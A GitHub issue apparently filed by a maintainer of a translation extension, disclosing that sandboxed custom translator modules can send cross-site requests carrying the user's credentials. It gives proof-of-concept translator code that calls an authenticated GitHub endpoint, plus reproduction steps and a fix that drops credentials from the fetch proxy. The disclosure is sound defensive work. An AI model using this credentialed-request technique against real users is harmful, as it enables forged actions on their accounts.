Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Prevent potential XSS attacks for custom translators #492

Open
vitonsky opened this issue Jun 28, 2024 · 0 comments
Open

Prevent potential XSS attacks for custom translators #492

vitonsky opened this issue Jun 28, 2024 · 0 comments
Labels
custom modules enhancement New feature or request important Must do it
Milestone
Next release

Comments

@vitonsky
Copy link
Collaborator

vitonsky commented Jun 28, 2024
edited
Loading

The problem

Currently custom translators run in sandboxed iframe, so they have no access to extension API.

Hovewer, custom translator may sent requests with included credentials, so it is potentially possible that some code will send request to site of bank, to send money from one account to another.

POC code:

class TestTranslator {
	translate = async (text, from, to) => {
        var response = await fetch("https://github.com/notifications/indicator", {
        "method": "GET",
        "mode": "cors",
        "credentials": "include",
        "headers": {
            "Accept": "application/json",
        },
    }).then(r=>r.json());

		return JSON.stringify({isHacked: response.error === undefined, response, request: {text, from, to}}, null, 2);
	};

	translateBatch = (texts, from, to) =>
		Promise.all(texts.map((text) => this.translate(text, from, to)));

	getLengthLimit = () => 4000;
	getRequestsTimeout = () => 300;
	checkLimitExceeding = (text) => {
		const textLength = !Array.isArray(text)
			? text.length
			: text.reduce((len, text) => len + text.length, 0);

		return textLength - this.getLengthLimit();
	};

	static isSupportedAutoFrom = () => true;

	// prettier-ignore
	static getSupportedLanguages = () => [
		"af", "sq", "am", "ar", "hy", "as", "ay", "az", "bm", "eu",
		"be", "bn", "bho", "bs", "bg", "ca", "ceb", "ny", "zh", "zh_HANT",
		"co", "hr", "cs", "da", "dv", "doi", "nl", "en", "eo", "et", "ee",
		"tl", "fi", "fr", "fy", "gl", "ka", "de", "el", "gn", "gu", "ht",
		"ha", "haw", "iw", "hi", "hmn", "hu", "is", "ig", "ilo", "id",
		"ga", "it", "ja", "jw", "kn", "kk", "km", "rw", "gom", "ko",
		"kri", "ku", "ckb", "ky", "lo", "la", "lv", "ln", "lt", "lg",
		"lb", "mk", "mai", "mg", "ms", "ml", "mt", "mi", "mr", "mni-Mtei",
		"lus", "mn", "my", "ne", "no", "or", "om", "ps", "fa", "pl",
		"pt", "pa", "qu", "ro", "ru", "sm", "sa", "gd", "nso", "sr",
		"st", "sn", "sd", "si", "sk", "sl", "so", "es", "su", "sw", "sv",
		"tg", "ta", "tt", "te", "th", "ti", "ts", "tr", "tk", "ak", "uk", "ur",
		"ug", "uz", "vi", "cy", "xh", "yi", "yo", "zu"
	];
}

TestTranslator;
  • Login in GitHub if still don't
  • Insert POC code as custom translator
  • If you see isHacked true, then it mean a problem still reproduces

This code sent request to GitHub endpoint that is over an authentication. If this endpoint does not return an error, it means the code may sent requests as legit user.

The solution

To prevent this problem, we should omit credentials in our fetch proxy.
@vitonsky vitonsky added enhancement New feature or request important Must do it custom modules labels Jun 28, 2024
@vitonsky vitonsky added this to the Next release milestone Jun 28, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
custom modules enhancement New feature or request important Must do it
Projects
None yet
Milestone
Next release
Development

No branches or pull requests
1 participant
@vitonsky